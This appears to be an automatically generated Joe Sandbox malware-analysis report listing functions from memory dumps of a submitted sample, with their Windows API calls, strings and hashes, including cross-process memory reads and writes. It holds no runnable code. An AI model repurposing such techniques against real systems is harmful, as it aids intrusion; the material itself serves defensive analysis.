Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 55d91d42a5dbba68a49a242d6e293c32156b6601267c056cbcbb1bbc013f611c
Instruction ID: 64591c7c2261043d0fff6a4a5804f5111207f4e1d4bc4f0be205006162cc58a2
Opcode Fuzzy Hash: 55d91d42a5dbba68a49a242d6e293c32156b6601267c056cbcbb1bbc013f611c
Instruction Fuzzy Hash: 6C013931D01A19DBCF00EFE5DC485EDBB78BB09711F508156EA49F2142DF70555187E5

Function 00A6810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A68121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A6812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A6813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A68141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A68157

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: ba2bb62a9cdb9bf310b352010a66d864ecff4bf0ed6081b37ce57de5b1956449
Instruction ID: 0c47e4f50e077610a961399b22c8de0f7f1a505646898fde2b5ad94b05f9e0be
Opcode Fuzzy Hash: ba2bb62a9cdb9bf310b352010a66d864ecff4bf0ed6081b37ce57de5b1956449
Instruction Fuzzy Hash: 43F04F71300304AFEB214FA5EC99E6B3BACEF4A758B100226FA45C6160DE659942DA60

Function 00A6C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00A6C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 00A6C20E
MessageBeep.USER32(00000000), ref: 00A6C226
KillTimer.USER32(?,0000040A), ref: 00A6C242
EndDialog.USER32(?,00000001), ref: 00A6C25C

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 0ca1b8fb33130b38b1dc323153803335bd34e544b71200a88083dad10110e87a
Instruction ID: 87f7166c59062f4108a321b5a82783ffbae659587c0928c3b33f6afd4885ad94
Opcode Fuzzy Hash: 0ca1b8fb33130b38b1dc323153803335bd34e544b71200a88083dad10110e87a
Instruction Fuzzy Hash: 6A01DB306043049BEB20ABB0DD5EFE67778FF00705F04026AFA82D14E0DBF469558B90

Function 00A113B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00A113BF
StrokeAndFillPath.GDI32(?,?,00A4B888,00000000,?), ref: 00A113DB
SelectObject.GDI32(?,00000000), ref: 00A113EE
DeleteObject.GDI32 ref: 00A11401
StrokePath.GDI32(?), ref: 00A1141C

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 377208b9bfb04f93a81b0d55e0385f0ebd5e5807ba035173d5149c1da5c36b7c
Instruction ID: ff1f3db66a3089081f5319900900ff1964f583a13c2c05f1576dfd755a2f96cc
Opcode Fuzzy Hash: 377208b9bfb04f93a81b0d55e0385f0ebd5e5807ba035173d5149c1da5c36b7c
Instruction Fuzzy Hash: 4BF0CD30505708DFDB11DFA6EC4C79C3BA8AB01726F188226E53A890F1D7315596FF50

Function 00A7C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00A7C432
CoCreateInstance.OLE32(00AA2D6C,00000000,00000001,00AA2BDC,?), ref: 00A7C44A

Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22

CoUninitialize.OLE32 ref: 00A7C6B7

Strings

.lnk, xrefs: 00A7C3C6, 00A7C3EE, 00A7C3F8

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: f562b6ac61c7223f803fba234bc0d94198f5803237c488d19775263903213ce5
Instruction ID: 623ffb2999f62945036b28bc97de55655b091ac7a70cedf6c82513e812a9c6f2
Opcode Fuzzy Hash: f562b6ac61c7223f803fba234bc0d94198f5803237c488d19775263903213ce5
Instruction Fuzzy Hash: 1CA11871204205AFD700EF64C991EAFB7ECEF89354F00492DF1559B1A2EB71EA49CB52

Function 00A22CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00A30DB6: std::exception::exception.LIBCMT ref: 00A30DEC
Part of subcall function 00A30DB6: __CxxThrowException@8.LIBCMT ref: 00A30E01

Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22

Part of subcall function 00A17A51: _memmove.LIBCMT ref: 00A17AAB

__swprintf.LIBCMT ref: 00A22ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00A22D66

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: eac9fc0d9652c03eae13380868fa62d123a071b765f9a53f105f838115b9b540
Instruction ID: b188cf9a79b18482435f069c09d9013c1c184f668019a75a6dd3ffeb2aa20bb9
Opcode Fuzzy Hash: eac9fc0d9652c03eae13380868fa62d123a071b765f9a53f105f838115b9b540
Instruction Fuzzy Hash: 6E918071508211AFC714EF28D995DAFB7B8FF95710F01082DF8859B2A1EA30ED88CB52

Function 00A7B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A14743,?,?,00A137AE,?), ref: 00A14770

CoInitialize.OLE32(00000000), ref: 00A7B9BB
CoCreateInstance.OLE32(00AA2D6C,00000000,00000001,00AA2BDC,?), ref: 00A7B9D4
CoUninitialize.OLE32 ref: 00A7B9F1

Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC

Strings

.lnk, xrefs: 00A7B99D, 00A7B9AB

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: d07f78bcb1d0b0517478ba132eab3a75236c8ca22bc976cfd0034dd1bc6957ad
Instruction ID: 38b788c72d9c32cbd971258a7c9f2332b00751c5e2d08e474d3d06df9f26d0a5
Opcode Fuzzy Hash: d07f78bcb1d0b0517478ba132eab3a75236c8ca22bc976cfd0034dd1bc6957ad
Instruction Fuzzy Hash: 8EA159756043059FCB00EF14C994E5AB7E5FF89314F148998F8999B3A1CB31ED46CB91

Function 00A3501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00A350AD

Part of subcall function 00A400F0: __87except.LIBCMT ref: 00A4012B

Strings

pow, xrefs: 00A35085, 00A350A2

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 0f2784eeed40cdfb4896d2480d92969641d2cdc6a58d7d0ffaba3794e2ba90e9
Instruction ID: 478c2fe9dc8b22f216f7fbdaa73130477a4864e9b52d719ea411fe8a34630244
Opcode Fuzzy Hash: 0f2784eeed40cdfb4896d2480d92969641d2cdc6a58d7d0ffaba3794e2ba90e9
Instruction Fuzzy Hash: E7518D75D085028ADB15BB7CCD41B6F2BA0DB82710F208E59F6D5862E9DF358DC4AAC2

Function 00A26192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A26248
_memmove.LIBCMT ref: 00A262E4
_memset.LIBCMT ref: 00A26308

Strings

ERCP, xrefs: 00A261B3

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: fb4c8e589b44390ef7856c75d417ca38559e63da6aeb8d20a3f4592c2fa4650c
Instruction ID: edc6bc42f431153437450359131c90736d7059aaaacb9eb0c2924acc9ebca722
Opcode Fuzzy Hash: fb4c8e589b44390ef7856c75d417ca38559e63da6aeb8d20a3f4592c2fa4650c
Instruction Fuzzy Hash: B2518D71901315DBDB25CF69D945BEBB7F4EF08304F20457EE44ADA291E770AA848B40

Function 00A697F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A714BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A69296,?,?,00000034,00000800,?,00000034), ref: 00A714E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00A6983F

Part of subcall function 00A71487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A692C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00A714B1

Part of subcall function 00A713DE: GetWindowThreadProcessId.USER32(?,?), ref: 00A71409
Part of subcall function 00A713DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A6925A,00000034,?,?,00001004,00000000,00000000), ref: 00A71419
Part of subcall function 00A713DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A6925A,00000034,?,?,00001004,00000000,00000000), ref: 00A7142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A698AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A698F9

Strings

@, xrefs: 00A69911

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 6c8549aeec119bb030f678b4e6b27a8829005452a69085461cc18bd54960fffb
Instruction ID: c606521a72f1cc26a71be2ae29ea5beee2e47ad4840d1b9c7741401d51f64ef6
Opcode Fuzzy Hash: 6c8549aeec119bb030f678b4e6b27a8829005452a69085461cc18bd54960fffb
Instruction Fuzzy Hash: 91415376A0121CBFDB20DFA4CD81ADEBBB8EF05300F008159FA59B7151DA716E45CBA1

Function 00A97946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A9F910,00000000,?,?,?,?), ref: 00A979DF
GetWindowLongW.USER32 ref: 00A979FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A97A0C

Strings

SysTreeView32, xrefs: 00A979B1

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 386d13a622444aa568659cc35df503d3bb35d0f8d71ffae6fbfff166b8f9bdf4
Instruction ID: 3a16347f78bc60b6ea71b0eceee6c508fd71dcc3622a2c0ca5e9e7350fe56900
Opcode Fuzzy Hash: 386d13a622444aa568659cc35df503d3bb35d0f8d71ffae6fbfff166b8f9bdf4
Instruction Fuzzy Hash: EF319A31214206AFDF118F78DC45BEA77A9EB09324F244725F875E22E0D731E9518B60

Function 00A973D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A97461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A97475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A97499

Strings

SysMonthCal32, xrefs: 00A9742C

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 5510fe012f8385a787ec7331550a7667fffa291f273577eede2232c153e2279d
Instruction ID: d4138f613b426e594395f8277bb0b52a329c3d37da6726648855430a9ce6a14b
Opcode Fuzzy Hash: 5510fe012f8385a787ec7331550a7667fffa291f273577eede2232c153e2279d
Instruction Fuzzy Hash: 80218032610218ABDF11CFA4DC46FEE3BA9EB88724F110114FA156B191DA75AC519BA0

Function 00A97B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A97C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A97C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A97C5F

Strings

msctls_updown32, xrefs: 00A97BC4

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: de9dd1afd78774a0e294e932ce75468c40f084d90bc80132f4f02110a6d77830
Instruction ID: cccad1d00f1b146e30d2fc9a6f3ce3a9093881dd6e699431ced58eabf03b2ada
Opcode Fuzzy Hash: de9dd1afd78774a0e294e932ce75468c40f084d90bc80132f4f02110a6d77830
Instruction Fuzzy Hash: 07214AB5614209AFDB10DF68DCC1DAA37ECEB5A394B540459FA019B3A1CB31EC529AB0

Function 00A96CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A96D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A96D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A96D70

Strings

Listbox, xrefs: 00A96D08

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: aeb3c2998a175ea95fce11c2c6e2d41b8c65c63e402068961923722cd8f59058
Instruction ID: 397d13b793310de7c0d749e1e93596d599a38d630898d380f360a7c9e63c5903
Opcode Fuzzy Hash: aeb3c2998a175ea95fce11c2c6e2d41b8c65c63e402068961923722cd8f59058
Instruction Fuzzy Hash: BE219232710118BFDF118F54DC45FEB3BBAEF89750F118129FA559B1A0CA719C5297A0

Function 00A9770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A97772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A97787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A97794

Strings

msctls_trackbar32, xrefs: 00A97749

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 5ff16eac1c495a4594b13ed5c8874b82ce7309d26482803b7f86b29d14180207
Instruction ID: 3eaece3497b8814688981390fda9735d5fa48aa400326320188c6ee592b61709
Opcode Fuzzy Hash: 5ff16eac1c495a4594b13ed5c8874b82ce7309d26482803b7f86b29d14180207
Instruction Fuzzy Hash: 44112372210208BEEF249FA0CC05FEB37A8EF88B54F120528FA41A6090C672E811CB20

Function 00A14C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00A14B83,?), ref: 00A14C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A14C56

Strings

Wow64RevertWow64FsRedirection, xrefs: 00A14C50
kernel32.dll, xrefs: 00A14C3F

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
